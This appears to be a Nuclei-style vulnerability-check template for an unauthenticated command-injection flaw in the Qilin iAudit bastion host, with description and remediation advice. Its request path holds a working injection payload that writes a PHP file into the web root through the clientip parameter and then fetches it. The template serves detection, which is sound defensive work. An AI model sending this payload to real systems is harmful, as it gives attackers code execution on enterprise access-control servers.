id: Qilin-Bastion-HostRce
info:
  name: iAudit-fortressaircraft-rce
  author:
  - l0ne1y
  description: |-
    Zhongyuan Qilin iAudit operation and maintenance audit system unauthorized remote command execution vulnerability
    The Zhongyuan Qilin iAudit operation and maintenance audit system is an integrated hardware/software unified security operation and maintenance platform (bastion host) developed by Beijing Zhongyuan Qilin Technology Co., Ltd. It supports unified identity authentication, unified authorization, unified auditing, and unified monitoring for enterprise operation and maintenance personnel.

    The Zhongyuan Qilin iAudit operation and maintenance audit system has an unauthorized remote command execution vulnerability, and in-the-wild exploitation has recently been observed. When the get_luser_by_sshport.php interface retrieves the path variable, it performs unfiltered string concatenation. An attacker can exploit this to inject commands and obtain system privileges on the bastion host.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users obtain the latest patch or latest version from the official website: https://www.tosec.com.cn/

    Temporary fix:
    1. Do not expose the Zhongyuan Qilin iAudit operation and maintenance audit system to the public network
    2. Restrict access to the get_luser_by_sshport.php interface on security management devices
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==200 && status_code_2==200
    - contains(body_2,verify)
  matchers-condition: and
  path:
  - '{{BaseURL}}/get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20{{verify}};unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/{{filename}}.php;&clientport=1'
  - '{{BaseURL}}/{{filename}}.php'
  method: GET
  req-condition: true
variables:
  filename: '{{rand_text_alpha(6, "abc")}}'
  verify: '{{rand_text_alphanumeric(8,"")}}'
